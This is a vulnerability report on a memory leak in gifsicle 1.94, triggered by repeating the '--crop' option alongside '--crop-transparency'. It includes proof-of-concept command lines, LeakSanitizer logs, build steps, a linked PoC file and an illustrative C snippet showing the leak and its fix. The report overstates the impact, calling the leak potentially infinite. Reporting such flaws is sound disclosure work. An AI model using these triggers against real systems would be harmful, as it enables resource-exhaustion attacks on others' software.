Description
We found a memory leak error when running gifsicle with the "--crop 3,6+5x6 --crop-transparency" configuration options.
At the same time, because gifsicle does not check repeated assignments of the "--crop" configuration, each additional assignment of the "--crop" configuration in the command line parameters will increase the memory leak by 48 bytes. **Therefore, the size of this memory leak can be infinite.** For example, an attacker can use "--crop 3,6+5x6" in the command line one hundred thousand times, which will cause a memory leak of 4800000 bytes while the program is running.
**Moreover, although gifsicle will raise a warning, it will still execute the program's processing steps for gif files normally and will not directly exit the program with an error.** This allows attackers to use gifsicle maliciously.
It should be noted that gifsicle (version 1.92-2) downloaded through apt-get may also trigger this vulnerability, which may endanger the system security of Debian users.
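An added illustration (not gifsicle's code) of the pattern described above: an option loop that allocates a 48-byte record for every `--crop` and overwrites the previous pointer without freeing it, beside the fix that releases the earlier record before replacing it. The struct, function and field names are hypothetical; only the crop spec format and the 48-byte object size are taken from this report.

```c
/* Illustration of the reported pattern, not gifsicle's code; names are hypothetical. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* 48 bytes, the size of the object LeakSanitizer reports above (layout is made up). */
typedef struct { int x, y, w, h; int reserved[8]; } crop_t;

static long live_bytes;  /* stands in for LeakSanitizer's accounting */

/* Allocates and parses one crop spec; "3,6+5x6" is corner (3,6), width 5, height 6. */
static crop_t *new_crop(const char *spec) {
    crop_t *c = calloc(1, sizeof *c); if (!c) abort();
    live_bytes += sizeof *c;
    if (sscanf(spec, "%d,%d+%dx%d", &c->x, &c->y, &c->w, &c->h) != 4)
        fprintf(stderr, "bad crop spec: %s\n", spec);
    return c;
}

static void free_crop(crop_t *c) { if (c) { live_bytes -= sizeof *c; free(c); } }

/* Option loop over argv. fix == 0: every "--crop" overwrites the pointer and nothing
 * is ever freed (the reported behaviour). fix == 1: the previous record is released
 * before replacement and the last one at exit. Returns bytes still allocated at exit. */
long crop_leak_bytes(int argc, const char **argv, int fix) {
    crop_t *crop = NULL;
    live_bytes = 0;
    for (int i = 1; i < argc; i++) {
        if (strcmp(argv[i], "--crop") == 0 && i + 1 < argc) {
            if (fix) free_crop(crop);  /* release before overwrite */
            crop = new_crop(argv[++i]);
        }
    }
    if (fix) free_crop(crop);
    return live_bytes;
}

/* Builds a constructed command line "gifsicle --crop 3,6+5x6 [...] --crop-transparency
 * in.gif -o out.gif" with n copies of the crop option and returns the resulting leak. */
long leak_for_repeats(int n, int fix) {
    int argc = 2 * n + 5, k = 0;
    const char **argv = malloc(argc * sizeof *argv); if (!argv) abort();
    argv[k++] = "gifsicle";
    for (int i = 0; i < n; i++) { argv[k++] = "--crop"; argv[k++] = "3,6+5x6"; }
    argv[k++] = "--crop-transparency"; argv[k++] = "in.gif"; argv[k++] = "-o"; argv[k++] = "out.gif";
    long leaked = crop_leak_bytes(argc, argv, fix);
    free(argv);
    return leaked;
}
```

With `fix == 0` the result grows by 48 bytes per repetition, matching the 48-byte and 4800-byte LeakSanitizer reports below; with `fix == 1` it stays at zero.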
Location
Gif_Realloc: gifsicle/src/fmalloc.c:19:13
Affected Component: gifsicle/gifsicle
ASAN Log
./src/gifsicle --crop 3,6+5x6 --crop-transparency gifsiclepoc -o out.gif
```
=================================================================
==1919443==ERROR: LeakSanitizer: detected memory leaks
Direct leak of 48 byte(s) in 1 object(s) allocated from:
    #0 0x494f79 in realloc (/afltest/gifsicle/src/gifsicle+0x494f79)
    #1 0x4dc29c in Gif_Realloc /afltest/gifsicle/src/fmalloc.c:19:13
    #2 0x7ffff7c4c082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
SUMMARY: AddressSanitizer: 48 byte(s) leaked in 1 allocation(s).
```
As mentioned in the Description section, since gifsicle does not check repeated assignments of the "--crop" configuration parameter, we can increase the number of such assignments to the "--crop" configuration parameter to cause more memory leaks.
./src/gifsicle --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop 3,6+5x6 --crop-transparency gifsiclepoc -o out.gif
```
=================================================================
==1919446==ERROR: LeakSanitizer: detected memory leaks
Direct leak of 4800 byte(s) in 100 object(s) allocated from:
    #0 0x494f79 in realloc (/afltest/gifsicle/src/gifsicle+0x494f79)
    #1 0x4dc29c in Gif_Realloc /afltest/gifsicle/src/fmalloc.c:19:13
    #2 0x7ffff7c4c082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
SUMMARY: AddressSanitizer: 4800 byte(s) leaked in 100 allocation(s).
```
Version
```
LCDF Gifsicle 1.94
Copyright (C) 1997-2023 Eddie Kohler
This is free software; see the source for copying conditions.
There is NO warranty, not even for merchantability or fitness for a
particular purpose.
```
Reference
https://github.com/kohler/gifsicle
Actual Behavior
Memory leak
PoC
gifsiclepoc: https://github.com/Frank-Z7/z-vulnerabilitys/blob/main/gifsiclepoc
Reproduction
```
git clone https://github.com/kohler/gifsicle.git
cd gifsicle
autoreconf -i
CFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" CXXFLAGS=" -fsanitize=address -fno-omit-frame-pointer -g" ./configure
make
./src/gifsicle --crop 3,6+5x6 --crop-transparency gifsiclepoc -o out.gif
```
Environment
ubuntu:20.04
gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.2)
clang version 10.0.0-4ubuntu1
afl-cc++4.09
Credit
Zeng Yunxiang ([Huazhong University of Science and Technology](http://cse.hust.edu.cn/))
Song Jiaxuan